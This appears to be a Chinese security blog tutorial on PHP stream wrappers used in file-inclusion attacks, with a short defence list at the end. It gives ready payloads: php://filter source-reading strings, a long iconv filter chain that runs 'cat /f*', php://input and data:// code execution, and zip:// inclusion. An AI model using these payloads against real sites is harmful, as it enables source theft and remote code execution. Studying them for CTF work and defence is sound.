php伪协议

2024-11-08 15 0

定义

PHP内置了很多URL风格的封装协议,类似fopen()、copy()、file_exists()和filesize()的文件系统函数

file://协议

该协议用于访问本地文件,使用条件不受allow_url_fopenallow_url_include的影响

使用方法
file:// 文件的绝对路径

但是该文件如果包含了php代码会执行php代码

php://协议

php://用于访问各个输入/输出流
主要使用以下两种
php://filter/-->用于读取源码
php://input-->用于执行php代码

php://filter/

读取包含php代码文件内容需要进行某种编码进行输出,不然会当作php代码执行就无法查看文章内容

利用条件

  • allow_url_fopen :off/on

  • allow_url_include:off/on

payload
php://filter/read=convert.base64-encode/resource=file
payload分析
  • php://filter/:这是一个 PHP 的流封装器,用于在读写数据时提供过滤功能。

  • read=convert.base64-encode/:这里指定了一个过滤器,告诉 PHP 在读取数据之前将其进行 base64 编码。convert.base64-encode是一个 PHP 内置的过滤器,用于将数据转换为 base64 编码

  • resource=file:这部分指定了要操作的资源。在这个例子中,file表示我们希望对一个文件进行操作,具体来说是对文件的内容进行 base64 编码读取

其中,过滤器可以更换为其他编码可以绕过一些读取限制
模板如下

php://filter/convert.iconv.a.b/resource=check.php (a,b 位置是编码格式)

常用例子

php://filter/convert.iconv.UTF-7.UCS-4*/resource=check.php


php://filter/read=string.rot13/resource=imposible.php //rot3加密

同时有一个通用文件包含,里面有诸多过滤器,可以借鉴

?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-
encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-

1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|conver

t.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|co

nvert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-

16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-

decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|co

nvert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-

16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|conver

t.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-

16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-

decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|co

nvert.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-

16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-

decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR

|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-

932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-

decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-

16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-

932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-

decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-

decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-

decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-

156.JOHAB|convert.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|conver

t.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|co

nvert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-

encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-

932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-

decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-

decode/resource=php://temp&0=cat%20/f*

php://input/

php://input可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行

利用条件
  • allow_url_fopen :off/on

  • allow_url_include:on

利用流程

利用
?php://input+POST请求中写入php代码

注意
php代码他会像日志一样编码

%3C%3Fphp++phpinfo%28%29%3B+%3F%3E

所以进行POST请求时需要使用burp进行,后者将php代码编码后无法执行

有写入权限也可以使用fopen函数写入

ZIP://协议

zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。从而实现任意代码执行。

URL传入协议需要注意

  • zip://中只能传入绝对路径。

  • 要用#分割压缩包和压缩包里的内容,并且#要用url编码成%23(即下述POC中#要用%23替换)

  • 只需要是zip的压缩包即可,后缀名可以任意更改。

  • 相同的类型还有zlib://和bzip2://

利用条件

  • allow_url_fopen :off/on

  • allow_url_include:off/on

payload

zip://[压缩包绝对路径]#[压缩包内文件]

例子如下
?file=zip://D:\1.zip%23phpinfo.txt

data://协议

data://同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行

利用条件

  • allow_url_fopen :on

  • allow_url_include:on

payload

  1. 执行命令

data://text/plain,<?php phpinfo();?>
//如果此处对特殊字符进行了过滤,我们还可以通过base64编码后再输入:
data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
且php代码里面base64编码之前不能用分号,否则会报错无法执行
因为分号没有被处理为有效的 PHP 语句,可能会导致意外的解析结果

2. 绕过(file_get_contents($_GET['a'],'r')="success"
需要绕过上述
依旧是上面的payload

data://text/plain;base64,c3VjY2Vzcw== //'c3VjY2Vzcw=='为success的base64编码

payload分析

  • data://:这是 PHP 的数据流封装器,允许直接处理数据,而不需要真正的文件存在

  • text/plain:这部分指定了数据的 MIME 类型,表示数据是普通文本类型

  • <?php phpinfo();?>:这是实际的数据部分。在这个例子中,是一个包含 phpinfo();函数调用的 PHP 代码片段

防御方法

  1. 使用str_replace等方法过滤掉危险字符

  2. 配置open_basedir,防止目录遍历(open_basedir 将php所能打开的文件限制在指定的目录树中)

  3. php版本升级,防止%00截断

  4. 对上传的文件进行重命名,例如伪随机数,防止被读取

  5. 白名单限制

  6. allow_url_include和allow_url_fopen最小权限化


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论